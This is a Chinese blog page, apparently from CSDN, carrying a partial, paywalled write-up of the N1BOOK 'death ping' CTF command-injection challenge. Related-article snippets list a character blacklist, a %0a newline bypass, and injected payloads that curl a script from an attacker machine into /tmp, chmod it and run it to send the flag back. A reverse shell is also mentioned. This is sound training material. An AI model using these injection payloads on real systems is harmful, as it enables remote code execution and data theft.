《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令

最新推荐文章于 2024-11-13 22:36:43 发布
最新推荐文章于 2024-11-13 22:36:43 发布
阅读量3.4k 收藏 13
点赞数 3
分类专栏: 《从0到1:CTFer成长之路》
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46703850/article/details/114023965
版权
本文介绍了《从0到1:CTFer成长之路》书籍配套的CTF挑战,涉及Linux Labs靶机的使用和一道关于死亡ping命令的题目。通过寻找黑名单过滤字符、解决BurpSuite中文乱码、编写并执行bash脚本,尝试反弹shell并监听端口,以获取flag。文中详细阐述了解题步骤,包括如何将bash脚本上传至tmp目录并赋予执行权限,以及在172.16.128.14机器上监听8080端口。
摘要由CSDN通过智能技术生成

[第二章 web进阶]死亡ping命令


介绍:记录一下笔记,方便以后迅速回忆使用。

《从0到1:CTFer成长之路》书籍配套题目,来源网站:《从0到1:CTFer成长之路》

准备工作

  • 首先在BUUCTF/Basic/Linux Labs开一个靶机
    在这里插入图片描述

  • 使用ssh命令连接

ssh -p 28412 root@node3.buuoj.cn
node3.buuoj.cn:28412

C:\WINDOWS\system32>ssh -p 28412 root@node3.buuoj.cn
root@node3.buuoj.cn's password:
Last login: Fri Feb 26 02:26:13 2021 from 172.16.128.14
  • 其实这也是道题,也是有flag,好吧,先不管这个
root@eef94e4eb444:/# cd ..
root@eef94e4eb444:/# sl
-bash: sl: command not found
root@eef94e4eb444:/# ls
bd_build  boot  etc       get-pip.py  lib    media  opt   root  sbin  sys  usr
bin       dev   flag.txt  home        lib64  mnt    proc  run   srv   tmp  var
root@eef94e4eb444:/# cat flag.txt
flag{
   a22846a4-5a80-4578-8a3c-22cd4e772e28}
root@eef94e4eb444:/#
  • 查看本机公网IP
root@ea1f42b1ee35:/# curl cip.cc
IP      : 111.73.45.68
地址    : 中国  江西  上饶
运营商  : 电信

数据二  : 江西省上饶市 | 电信

数据三  : 中国江西上饶 | 电信

URL     : http://www.cip.cc/111.73.45.68

开始做题

  • 存在一些黑名单过滤的,被拦截时候显示IP包含恶意字符,那我们先把这些字符找出来,这样后面就能更顺利。

最低0.47元/天 解锁文章
一个平凡de人
关注
专栏目录
error: external filter git-lfs smudge -- %f failed解决方案
weixin_43178406的博客
06-25 7万+
本文主要介绍了error: external filter git-lfs smudge – %f failed解决方案,希望能对使用git lfs的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
bash: ping: command not found解决方案
热门推荐
weixin_43178406的博客
05-13 4万+
本文主要介绍了bash: ping: command not found解决方案,希望能对使用Linux ping命令的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
BUUCTF--[第二章 web进阶]死亡ping命令
qq_45414878的博客
11-13 7615
BUUCTF–[第二章 web进阶]死亡ping命令 开启环境发现是一个ping的页面,并且过滤了许多字符 fuzz测试如下
[CTF夺旗赛] BUUCTF N1BOOK 第二章 web进阶
Da1NtY的博客
08-23 1332
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。BUUCTF是一个很好的CTF训练平台,这里介绍的是N1BOOK部分的第二章,后续会陆续更新。
BUUCTF---死亡Ping详解
qq_49422880的博客
05-25 3615
BUUCTF-GXYCTF2019 ping ping ping前言知识点总结关于通配符总结 前言  &esmp;昨晚半夜在一个大佬的博客里看到了个名叫BUUCTF的一个刷题的地方,心想大佬都在上面玩,我这波怎么不得在上面留下自己的痕迹,第二天就直接上手,也就遇到了ping 这题,这不简单直接连刷两题,因为之前也接触过关于ping的题,然而就在GXYCTF2019上的一篇WP上,刷新了我对绕过的认识,于是乎写下本博客记录所学知识点。 知识点总结 先上题目为敬: 疯狂暗示!!!首先我们这里先随便测
BUU N1BOOK [第二章 web进阶]死亡ping命令
SwBack的博客
09-02 2390
存在以下黑名单过滤 ["$", "{", "}", "`", ";", "&", "|", "(", ")", "\"","'", "~", "!", "@", "#", "%", "^", "*", "[", "]", "\\", ":", "-", "_"]; 但是发现%0a可以执行命令 准备工作 一台具备公网IP的服务器 我这里采用的是自己的服务器,没有服务器的可以注册个小号,在BUU平台开启如下环境 首先在公网服务器上面写入shell文件 内容如下 a=`cat /FLAG` c.
CTFping命令绕过及符号用法
诚邀网络通信领域商务合作
10-13 1万+
文章目录一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ig..
[实验室每日一题][20201123][Web]死亡ping命令
m0_50317371的博客
12-02 3866
题目:BUUCTF–[第二章 web进阶]死亡ping命令 前置基础(本题会用到的相关命令) liunx命令 ls命令 Linux ls(英文全拼:list files):命令用于显示指定工作目录下之内容(列出目前工作目录所含之文件及子目录)。 转自:菜鸟教程 cat命令 cat(英文全拼:concatenate):命令用于连接文件并打印到标准输出设备上。 转自:菜鸟教程 curl命令 curl(英文全拼:CommandLine Uniform Resource Locator):curl 是常用的命令
死亡ping
10-23
默认的情况下windows的ping发送的数据包大小为32byt,我们也可以自己定义它的大小,但有一个大小的限制,就是最大只能发送65500byt
从0到1:CTFer成长之路——死亡 Ping 命令
weixin_51559599的博客
10-26 442
手动尝试慢脚本生成可打印字符,后面拼接命令bp 爆破出现中文乱码设置编码爆破最终发现转义后的%0A拼接时未被过滤。
BUU N1BOOK题目死亡ping命令
weixin_48876267的博客
11-30 882
介绍:路由器管理台经常存在的网络ping测试,开发者常常会禁用大量的恶意字符串 version: "3.2" services: converter: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-command:latest ports: - 80:80 本地搭建docker-compose 打开题目 输入127.0.0.1&&id,发现报错。存在恶意字符过滤 抓包进行fuzz扫描测试 fu.
从0到1:CTFer成长之路死亡ping命令
一个努力学习网安的小牛马
10-26 236
死亡ping命令
【转】CTF-All-In-One(CTF从入门到放弃)pdf
03-20
CTF-All-In-One(CTF 从入门到放弃) ——“与其相信谣言,不如一直学习。”
CMD之Ping命令详解
IT老人
04-13 4682
Ping是典型的网络工具。Ping 是Windows系列自带的一个可执行命令,从98到最新的2003 Server版的计算机都带有这个命令行工具。Ping能够辨别网络功能的某些状态。这些网络功能的状态是日常网络故障诊断的基础。特别是Ping能够识别连接的二进制状态(也就是是否连通)。Ping 命令通过向计算机发送 ICMP 回应报文并且监听回应报文的返回,以校验与远程计算机或本地计算机的连接。对于每个发送报文, Ping 最多等待 1 秒,并打印发送和接收把报文的数量。
[第二章 web进阶]死亡ping命令
最新发布
shierbai的博客
11-13 336
127.0.0.1%0acurl B/1.sh > /tmp/1.sh #请求bash文件到tmp目录。1.先在B上面写一个1.sh文件里面是读取flag的命令,同时命令连接符去做目标主机端口监听。127.0.0.1%0achmod 777 /tmp/1.sh #给bash加权限。这里不想搞公网ip去做操作,看了一下别人用小号搞了一台内网主机。这里试了很多连接符,发现只有%0a可以绕过。这样会在B机器上面得到发过来的flag。2.然后通过命令注入让A执行。3.命令注入让A执行。
nu1l-死亡ping命令攻略
qq_58683895的博客
10-26 567
本文展示了从0到1成长之路ctfer-nu1l的死亡ping命令如何获取flag,并且包含了靶机在不同网络环境下的处理方法
Ping of Death
weixin_33985507的博客
08-19 411
09年七月份墨尔本电影节网站被黑,***用的方法就是死亡pingping-l65500-tIP -l定义数据包的大小; -t 向一个固定IP不停地PING, 通俗点:不停地发送一定大小的ICMP数据报。停止该命令的方法CTRL+C。如果你只有一台电脑也许没有什么效果,但如果有许多电脑(控制一...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值